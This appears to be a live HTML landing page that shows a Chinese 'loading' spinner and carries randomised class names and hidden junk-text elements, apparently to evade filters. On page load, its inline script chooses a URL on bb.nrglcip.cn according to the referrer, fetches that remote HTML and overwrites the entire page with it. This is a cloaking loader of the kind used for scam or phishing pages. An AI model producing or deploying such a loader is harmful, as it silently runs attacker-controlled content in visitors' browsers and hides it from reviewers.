<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Z0ZQVTxgt {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Z0ZQVTxgt .wlLgfAf2CU {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Z0ZQVTxgt .content {
            line-height: 50px;
            text-align: center
        }

        .Z0ZQVTxgt .img {
            width: 100%
        }

        .Z0ZQVTxgt .QzIEa8C {
            text-align: center
        }

        .Z0ZQVTxgt .QzIEa8C span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Z0ZQVTxgt .QzIEa8C span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Z0ZQVTxgt .QzIEa8C span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Z0ZQVTxgt .QzIEa8C span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Z0ZQVTxgt .QzIEa8C span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Z0ZQVTxgt .QzIEa8C span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Z0ZQVTxgt .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function PYUD36Q9ds(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var lHtpr = PYUD36Q9ds('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ lHtpr +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ lHtpr +".html?a=share";
		}
		
        KZBlP8HAy=url+"#"+new Date().getTime();
        KZBlP8HAy && function() {
            $.get(KZBlP8HAy, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >xyAivKzQ8ql3gMwAr7qr1TI549wuPTSYwagozxVOD9HJiQeoHJwNeac6zBurh2nrrd3sOgzOrk596eKLITVw</b>
<span style='display:none'>soKb1y3QbbEwza6Cp</span>
<h1 style='display:none' >x5iUhd8Dh30ioQjEWhwAVpUiHBGfQJ5oA6bb36eUeakGr4L568rktOxPah3HOf1DZfneQOYp5BDPtBgfwsH</h1>
<div style='display:none'>Oqif8Rn9946ir5CYZHF9OK08TTph9gFf</div>
<img  src='' style='display:none'><div class="Z0ZQVTxgt">
    <div class="wlLgfAf2CU">
        <div class="QzIEa8C">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>xsm8erzHr4isG3b5u</div>
<span style='display:none'>IGbEw8OkXjOk90Wu7xAHIOo3cbOfNcsVcNwWcPXP</span>
<ul style='display:none' >MURDTjOmHKZj93Em6PK32OrhEgR8vLm96SSkC2rpuNZeaak3szuyvYEEafAyO8BqGdP</ul>
<img  src='' style='display:none'>
<div style='display:none'>xsm8erzHr4isG3b5u</div>
<div style='display:none'>xsm8erzHr4isG3b5u</div>
<ul style='display:none' >MURDTjOmHKZj93Em6PK32OrhEgR8vLm96SSkC2rpuNZeaak3szuyvYEEafAyO8BqGdP</ul></body>
</html>